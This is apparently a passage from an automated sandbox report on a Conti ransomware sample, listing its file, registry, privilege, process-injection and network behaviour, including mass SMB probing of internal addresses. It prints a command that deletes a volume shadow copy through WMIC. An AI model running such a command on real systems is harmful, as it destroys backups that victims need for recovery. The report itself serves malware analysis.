File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_MAKC2R-ul-oob.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019VL_MAK_AE-ul-phn.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: 33	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: 34	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: 35	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: 36	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: 33	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: 34	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: 35	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: 36	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 2648 wrote to memory of 3304	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\SYSTEM32\cmd.exe
PID 2648 wrote to memory of 3304	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	C:\Windows\SYSTEM32\cmd.exe
PID 3304 wrote to memory of 2612	N/A	C:\Windows\SYSTEM32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe
PID 3304 wrote to memory of 2612	N/A	C:\Windows\SYSTEM32\cmd.exe	C:\Windows\System32\wbem\WMIC.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{F1454A4D-2AF3-49D4-9045-335EED1EFD8C}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{F1454A4D-2AF3-49D4-9045-335EED1EFD8C}'" delete

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	8.8.8.8.in-addr.arpa	udp
US	8.8.8.8:53	241.150.49.20.in-addr.arpa	udp
US	8.8.8.8:53	172.214.232.199.in-addr.arpa	udp
US	8.8.8.8:53	23.181.190.20.in-addr.arpa	udp
US	8.8.8.8:53	57.169.31.20.in-addr.arpa	udp
N/A	10.127.0.1:445		tcp
N/A	10.127.0.9:445		tcp
N/A	10.127.0.11:445		tcp
N/A	10.127.0.43:445		tcp
N/A	10.127.0.59:445		tcp
N/A	10.127.0.0:445		tcp
N/A	10.127.0.6:445		tcp
N/A	10.127.0.25:445		tcp
N/A	10.127.0.30:445		tcp
N/A	10.127.0.19:445		tcp
N/A	10.127.0.28:445		tcp
N/A	10.127.0.58:445		tcp
N/A	10.127.0.13:445		tcp
N/A	10.127.0.7:445		tcp
N/A	10.127.0.10:445		tcp
N/A	10.127.0.5:445		tcp
N/A	10.127.0.49:445		tcp
N/A	10.127.0.60:445		tcp
N/A	10.127.0.17:445		tcp
N/A	10.127.0.53:445		tcp
N/A	10.127.0.65:445		tcp
N/A	10.127.0.37:445		tcp
N/A	10.127.0.42:445		tcp
N/A	10.127.0.64:445		tcp
N/A	10.127.0.66:445		tcp
N/A	10.127.0.215:445		tcp
N/A	10.127.0.16:445		tcp
N/A	10.127.0.12:445		tcp
N/A	10.127.0.41:445		tcp
N/A	10.127.0.38:445		tcp
N/A	10.127.0.213:445		tcp
N/A	10.127.0.221:445		tcp
N/A	10.127.0.18:445		tcp
N/A	10.127.0.21:445		tcp
N/A	10.127.0.36:445		tcp
N/A	10.127.0.220:445		tcp
N/A	10.127.0.54:445		tcp
N/A	10.127.0.23:445		tcp
N/A	10.127.0.44:445		tcp
N/A	10.127.0.47:445		tcp
N/A	10.127.0.8:445		tcp
N/A	10.127.0.63:445		tcp
N/A	10.127.0.211:445		tcp
N/A	10.127.0.31:445		tcp
N/A	10.127.0.27:445		tcp
N/A	10.127.0.32:445		tcp
N/A	10.127.0.62:445		tcp
N/A	10.127.0.217:445		tcp
N/A	10.127.0.35:445		tcp
N/A	10.127.0.206:445		tcp
N/A	10.127.0.212:445		tcp
N/A	10.127.0.207:445		tcp
N/A	10.127.0.20:445		tcp
N/A	10.127.0.24:445		tcp
N/A	10.127.0.22:445		tcp
N/A	10.127.0.67:445		tcp
N/A	10.127.0.34:445		tcp
N/A	10.127.0.51:445		tcp
N/A	10.127.0.214:445		tcp
N/A	10.127.0.219:445		tcp
N/A	10.127.0.50:445		tcp
N/A	10.127.0.14:445		tcp
N/A	10.127.0.222:445		tcp
N/A	10.127.0.55:445		tcp
N/A	10.127.0.4:445		tcp
N/A	10.127.0.15:445		tcp
N/A	10.127.0.3:445		tcp
N/A	10.127.0.29:445		tcp
N/A	10.127.0.48:445		tcp
N/A	10.127.0.52:445		tcp
N/A	10.127.0.56:445		tcp
N/A	10.127.0.45:445		tcp
N/A	10.127.0.46:445		tcp
N/A	10.127.0.61:445		tcp
N/A	10.127.0.26:445		tcp
N/A	10.127.0.39:445		tcp
N/A	10.127.0.40:445		tcp
N/A	10.127.0.218:445		tcp
N/A	10.127.0.2:445		tcp
N/A	10.127.0.57:445		tcp
N/A	10.127.0.33:445		tcp
N/A	10.127.0.248:445		tcp
N/A	10.127.0.216:445		tcp
N/A	10.127.0.119:445		tcp
N/A	10.127.0.69:445		tcp
N/A	10.127.0.96:445		tcp
N/A	10.127.0.88:445		tcp
N/A	10.127.0.81:445		tcp
N/A	10.127.0.116:445		tcp
N/A	10.127.0.91:445		tcp
N/A	10.127.0.104:445		tcp
N/A	10.127.0.111:445		tcp
N/A	10.127.0.110:445		tcp
N/A	10.127.0.121:445		tcp
N/A	10.127.0.75:445		tcp
N/A	10.127.0.117:445		tcp
N/A	10.127.0.113:445		tcp
N/A	10.127.0.90:445		tcp
N/A	10.127.0.106:445		tcp
N/A	10.127.0.122:445		tcp
N/A	10.127.0.78:445		tcp
N/A	10.127.0.102:445		tcp
N/A	10.127.0.99:445		tcp
N/A	10.127.0.108:445		tcp
N/A	10.127.0.89:445		tcp
N/A	10.127.0.80:445		tcp
N/A	10.127.0.76:445		tcp
N/A	10.127.0.77:445		tcp
N/A	10.127.0.74:445		tcp
N/A	10.127.0.105:445		tcp
N/A	10.127.0.83:445		tcp
N/A	10.127.0.68:445		tcp
N/A	10.127.0.100:445		tcp
N/A	10.127.0.101:445		tcp
N/A	10.127.0.124:445		tcp
N/A	10.127.0.92:445		tcp
N/A	10.127.0.109:445		tcp
N/A	10.127.0.95:445		tcp
N/A	10.127.0.93:445		tcp
N/A	10.127.0.126:445		tcp
N/A	10.127.0.72:445		tcp
N/A	10.127.0.70:445		tcp
N/A	10.127.0.94:445		tcp
N/A	10.127.0.123:445		tcp
N/A	10.127.0.82:445		tcp
N/A	10.127.0.86:445		tcp
N/A	10.127.0.71:445		tcp
N/A	10.127.0.112:445		tcp
N/A	10.127.0.125:445		tcp
N/A	10.127.0.127:445		tcp
N/A	10.127.0.131:445		tcp
N/A	10.127.0.97:445		tcp
N/A	10.127.0.98:445		tcp
N/A	10.127.0.79:445		tcp
N/A	10.127.0.73:445		tcp
N/A	10.127.0.120:445		tcp
N/A	10.127.0.128:445		tcp
N/A	10.127.0.87:445		tcp
N/A	10.127.0.114:445		tcp
N/A	10.127.0.130:445		tcp
N/A	10.127.0.84:445		tcp
N/A	10.127.0.115:445		tcp
N/A	10.127.0.107:445		tcp
N/A	10.127.0.118:445		tcp
N/A	10.127.0.129:445		tcp
N/A	10.127.0.103:445		tcp
N/A	10.127.0.132:445		tcp
N/A	10.127.0.85:445		tcp
N/A	10.127.0.145:445		tcp
N/A	10.127.0.169:445		tcp
N/A	10.127.0.188:445		tcp
N/A	10.127.0.172:445		tcp
N/A	10.127.0.187:445		tcp
N/A	10.127.0.161:445		tcp
N/A	10.127.0.136:445		tcp
N/A	10.127.0.167:445		tcp
N/A	10.127.0.184:445		tcp
N/A	10.127.0.173:445		tcp
N/A	10.127.0.174:445		tcp
N/A	10.127.0.189:445		tcp
N/A	10.127.0.196:445		tcp
N/A	10.127.0.154:445		tcp
N/A	10.127.0.163:445		tcp
N/A	10.127.0.195:445		tcp
N/A	10.127.0.148:445		tcp
N/A	10.127.0.198:445		tcp
N/A	10.127.0.152:445		tcp
N/A	10.127.0.137:445		tcp
N/A	10.127.0.176:445		tcp
N/A	10.127.0.155:445		tcp
N/A	10.127.0.168:445		tcp
N/A	10.127.0.178:445		tcp
N/A	10.127.0.134:445		tcp
N/A	10.127.0.135:445		tcp
N/A	10.127.0.159:445		tcp
N/A	10.127.0.133:445		tcp
N/A	10.127.0.181:445		tcp
N/A	10.127.0.182:445		tcp
N/A	10.127.0.190:445		tcp
N/A	10.127.0.142:445		tcp
N/A	10.127.0.175:445		tcp
N/A	10.127.0.191:445		tcp
N/A	10.127.0.177:445		tcp
N/A	10.127.0.144:445		tcp
N/A	10.127.0.162:445		tcp
N/A	10.127.0.180:445		tcp
N/A	10.127.0.186:445		tcp
N/A	10.127.0.139:445		tcp
N/A	10.127.0.164:445		tcp
N/A	10.127.0.149:445		tcp
N/A	10.127.0.171:445		tcp
N/A	10.127.0.160:445		tcp
N/A	10.127.0.193:445		tcp
N/A	10.127.0.156:445		tcp
N/A	10.127.0.185:445		tcp
N/A	10.127.0.141:445		tcp
N/A	10.127.0.153:445		tcp
N/A	10.127.0.179:445		tcp
N/A	10.127.0.197:445		tcp
N/A	10.127.0.143:445		tcp
N/A	10.127.0.192:445		tcp
N/A	10.127.0.183:445		tcp
N/A	10.127.0.194:445		tcp
N/A	10.127.0.170:445		tcp
N/A	10.127.0.151:445		tcp
N/A	10.127.0.158:445		tcp
N/A	10.127.0.166:445		tcp
N/A	10.127.0.165:445		tcp
N/A	10.127.0.138:445		tcp
N/A	10.127.0.140:445		tcp
N/A	10.127.0.146:445		tcp
N/A	10.127.0.157:445		tcp
N/A	10.127.0.150:445		tcp
N/A	10.127.0.210:445		tcp
N/A	10.127.0.201:445		tcp
N/A	10.127.0.204:445		tcp
N/A	10.127.0.202:445		tcp
N/A	10.127.0.205:445		tcp
N/A	10.127.0.209:445		tcp
N/A	10.127.0.243:445		tcp
N/A	10.127.0.250:445		tcp
N/A	10.127.0.247:445		tcp
N/A	10.127.0.223:445		tcp
N/A	10.127.0.234:445		tcp
N/A	10.127.0.237:445		tcp
N/A	10.127.0.203:445		tcp
N/A	10.127.0.254:445		tcp
N/A	10.127.0.230:445		tcp
N/A	10.127.0.199:445		tcp
N/A	10.127.0.228:445		tcp
N/A	10.127.0.227:445		tcp
N/A	10.127.0.251:445		tcp
N/A	10.127.0.238:445		tcp
N/A	10.127.0.231:445		tcp
N/A	10.127.0.244:445		tcp
N/A	10.127.0.241:445		tcp
N/A	10.127.0.225:445		tcp
N/A	10.127.0.245:445		tcp
N/A	10.127.0.236:445		tcp
N/A	10.127.0.232:445		tcp
N/A	10.127.0.252:445		tcp
N/A	10.127.0.240:445		tcp
N/A	10.127.0.224:445		tcp
N/A	10.127.0.226:445		tcp
N/A	10.127.0.208:445		tcp
N/A	10.127.0.242:445		tcp
N/A	10.127.0.246:445		tcp
N/A	10.127.0.200:445		tcp
N/A	10.127.0.229:445		tcp
N/A	10.127.0.249:445		tcp
N/A	10.127.0.239:445		tcp
N/A	10.127.0.233:445		tcp
N/A	10.127.0.235:445		tcp
N/A	10.127.0.253:445		tcp
US	8.8.8.8:53	183.142.211.20.in-addr.arpa	udp
N/A	10.127.255.0:445		tcp
N/A	10.127.255.15:445		tcp
N/A	10.127.255.25:445		tcp
N/A	10.127.255.46:445		tcp
N/A	10.127.255.40:445		tcp
N/A	10.127.255.64:445		tcp
N/A	10.127.255.52:445		tcp
N/A	10.127.255.54:445		tcp
N/A	10.127.255.16:445		tcp
N/A	10.127.255.7:445		tcp
N/A	10.127.255.20:445		tcp
N/A	10.127.255.23:445		tcp
N/A	10.127.255.47:445		tcp
N/A	10.127.255.36:445		tcp
N/A	10.127.255.38:445		tcp
N/A	10.127.255.61:445		tcp
N/A	10.127.255.104:445		tcp
N/A	10.127.255.35:445		tcp
N/A	10.127.255.103:445		tcp
N/A	10.127.255.9:445		tcp
N/A	10.127.255.37:445		tcp
N/A	10.127.255.8:445		tcp
N/A	10.127.255.43:445		tcp
N/A	10.127.255.5:445		tcp
N/A	10.127.255.42:445		tcp
N/A	10.127.255.33:445		tcp
N/A	10.127.255.11:445		tcp
N/A	10.127.255.17:445		tcp
N/A	10.127.255.30:445		tcp
N/A	10.127.255.27:445		tcp
N/A	10.127.255.34:445		tcp
N/A	10.127.255.26:445		tcp
N/A	10.127.255.59:445		tcp
N/A	10.127.255.12:445		tcp
N/A	10.127.255.65:445		tcp
N/A	10.127.255.57:445		tcp
N/A	10.127.255.58:445		tcp
N/A	10.127.255.24:445		tcp
N/A	10.127.255.31:445		tcp
N/A	10.127.255.44:445		tcp
N/A	10.127.255.39:445		tcp
N/A	10.127.255.49:445		tcp
N/A	10.127.255.18:445		tcp
N/A	10.127.255.19:445		tcp
N/A	10.127.255.56:445		tcp
N/A	10.127.255.60:445		tcp
N/A	10.127.255.13:445		tcp
N/A	10.127.255.50:445		tcp
N/A	10.127.255.10:445		tcp
N/A	10.127.255.55:445		tcp
N/A	10.127.255.3:445		tcp
N/A	10.127.255.51:445		tcp
N/A	10.127.255.2:445		tcp
N/A	10.127.255.4:445		tcp
N/A	10.127.255.102:445		tcp
N/A	10.127.255.14:445		tcp
N/A	10.127.255.32:445		tcp
N/A	10.127.255.1:445		tcp
N/A	10.127.255.22:445		tcp
N/A	10.127.255.53:445		tcp
N/A	10.127.255.21:445		tcp
N/A	10.127.255.41:445		tcp
N/A	10.127.255.45:445		tcp
N/A	10.127.255.48:445		tcp
N/A	10.127.255.63:445		tcp
N/A	10.127.255.95:445		tcp
N/A	10.127.255.106:445		tcp
N/A	10.127.255.62:445		tcp
N/A	10.127.255.6:445		tcp
N/A	10.127.255.29:445		tcp
N/A	10.127.255.83:445		tcp
N/A	10.127.255.28:445		tcp
N/A	10.127.255.72:445		tcp
N/A	10.127.255.81:445		tcp
N/A	10.127.255.86:445		tcp
N/A	10.127.255.91:445		tcp
N/A	10.127.255.75:445		tcp
N/A	10.127.255.92:445		tcp
N/A	10.127.255.85:445		tcp
N/A	10.127.255.87:445		tcp
N/A	10.127.255.98:445		tcp
N/A	10.127.255.68:445		tcp
N/A	10.127.255.80:445		tcp
N/A	10.127.255.93:445		tcp
N/A	10.127.255.67:445		tcp
N/A	10.127.255.70:445		tcp
N/A	10.127.255.100:445		tcp
N/A	10.127.255.113:445		tcp
N/A	10.127.255.69:445		tcp
N/A	10.127.255.94:445		tcp
N/A	10.127.255.107:445		tcp
N/A	10.127.255.112:445		tcp
N/A	10.127.255.99:445		tcp
N/A	10.127.255.101:445		tcp
N/A	10.127.255.73:445		tcp
N/A	10.127.255.66:445		tcp
N/A	10.127.255.78:445		tcp
N/A	10.127.255.82:445		tcp
N/A	10.127.255.110:445		tcp
N/A	10.127.255.96:445		tcp
N/A	10.127.255.76:445		tcp
N/A	10.127.255.105:445		tcp
N/A	10.127.255.108:445		tcp
N/A	10.127.255.115:445		tcp
N/A	10.127.255.77:445		tcp
N/A	10.127.255.89:445		tcp
N/A	10.127.255.84:445		tcp
N/A	10.127.255.97:445		tcp
N/A	10.127.255.71:445		tcp
N/A	10.127.255.109:445		tcp
N/A	10.127.255.90:445		tcp
N/A	10.127.255.114:445		tcp
N/A	10.127.255.74:445		tcp
N/A	10.127.255.88:445		tcp
N/A	10.127.255.111:445		tcp
N/A	10.127.255.79:445		tcp
N/A	10.127.255.166:445		tcp
N/A	10.127.255.178:445		tcp
N/A	10.127.255.150:445		tcp
N/A	10.127.255.174:445		tcp
N/A	10.127.255.145:445		tcp
N/A	10.127.255.120:445		tcp
N/A	10.127.255.143:445		tcp
N/A	10.127.255.123:445		tcp
N/A	10.127.255.160:445		tcp
N/A	10.127.255.163:445		tcp
N/A	10.127.255.173:445		tcp
N/A	10.127.255.128:445		tcp
N/A	10.127.255.152:445		tcp
N/A	10.127.255.121:445		tcp
N/A	10.127.255.142:445		tcp
N/A	10.127.255.122:445		tcp
N/A	10.127.255.164:445		tcp
N/A	10.127.255.179:445		tcp
N/A	10.127.255.124:445		tcp
N/A	10.127.255.169:445		tcp
N/A	10.127.255.125:445		tcp
N/A	10.127.255.130:445		tcp
N/A	10.127.255.165:445		tcp
N/A	10.127.255.177:445		tcp
N/A	10.127.255.158:445		tcp
N/A	10.127.255.129:445		tcp
N/A	10.127.255.170:445		tcp
N/A	10.127.255.175:445		tcp
N/A	10.127.255.136:445		tcp
N/A	10.127.255.138:445		tcp
N/A	10.127.255.140:445		tcp
N/A	10.127.255.176:445		tcp
N/A	10.127.255.134:445		tcp
N/A	10.127.255.172:445		tcp
N/A	10.127.255.133:445		tcp
N/A	10.127.255.153:445		tcp
N/A	10.127.255.141:445		tcp
N/A	10.127.255.137:445		tcp
N/A	10.127.255.151:445		tcp
N/A	10.127.255.148:445		tcp
N/A	10.127.255.146:445		tcp
N/A	10.127.255.131:445		tcp
N/A	10.127.255.167:445		tcp
N/A	10.127.255.180:445		tcp
N/A	10.127.255.156:445		tcp
N/A	10.127.255.139:445		tcp
N/A	10.127.255.159:445		tcp
N/A	10.127.255.157:445		tcp
N/A	10.127.255.116:445		tcp
N/A	10.127.255.171:445		tcp
N/A	10.127.255.162:445		tcp
N/A	10.127.255.117:445		tcp
N/A	10.127.255.127:445		tcp
N/A	10.127.255.161:445		tcp
N/A	10.127.255.168:445		tcp
N/A	10.127.255.147:445		tcp
N/A	10.127.255.132:445		tcp
N/A	10.127.255.154:445		tcp
N/A	10.127.255.119:445		tcp
N/A	10.127.255.126:445		tcp
N/A	10.127.255.144:445		tcp
N/A	10.127.255.118:445		tcp
N/A	10.127.255.135:445		tcp
N/A	10.127.255.155:445		tcp
